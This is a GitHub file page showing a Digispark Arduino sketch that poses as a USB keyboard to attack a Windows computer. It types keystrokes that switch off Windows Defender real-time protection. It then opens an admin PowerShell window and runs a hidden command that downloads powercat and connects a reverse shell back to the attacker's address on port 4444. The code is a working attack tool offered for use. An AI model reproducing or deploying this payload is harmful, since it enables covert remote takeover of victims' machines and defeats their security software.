-
Notifications
You must be signed in to change notification settings - Fork 0
/
reverseShell.ino
75 lines (65 loc) · 2.42 KB
/
reverseShell.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#include "DigiKeyboard.h"
#define KEY_ESC 41
#define KEY_TAB 43
#define KEY_SPACE 44
void setup() {
pinMode(1, OUTPUT);
digitalWrite(1, LOW);
}
void loop() {
DigiKeyboard.sendKeyStroke(0);
disarm_defender();
create_reverse_shell();
while (true){
digitalWrite(1, HIGH);
delay(300);
digitalWrite(1, LOW);
delay(300);
}
}
void disarm_defender() {
// open the windows search
DigiKeyboard.sendKeyStroke(KEY_ESC, MOD_CONTROL_LEFT);
DigiKeyboard.delay(1700);
// open windows security settings (change it for the word 'security' in your language)
DigiKeyboard.print(F("seguridad de windows"));
DigiKeyboard.delay(1700);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// disable real-time protection
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_SPACE);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// exit windows security settings
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);
}
void create_reverse_shell (){
//open powershell prompt with admin rights
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.print(F("powershell"));
DigiKeyboard.delay(1700);
DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT|MOD_SHIFT_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
DigiKeyboard.delay(1500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1500);
// change the IP or if you are sure the target has internet connection put here powercat's release file, that way you wont need the http server
DigiKeyboard.print("PowerShell.exe -WindowStyle hidden {powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.18.141 -p 4444 -e powershell\"}");
// hides the shell from the user and it gives us access from the remote computer
DigiKeyboard.delay(1700);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}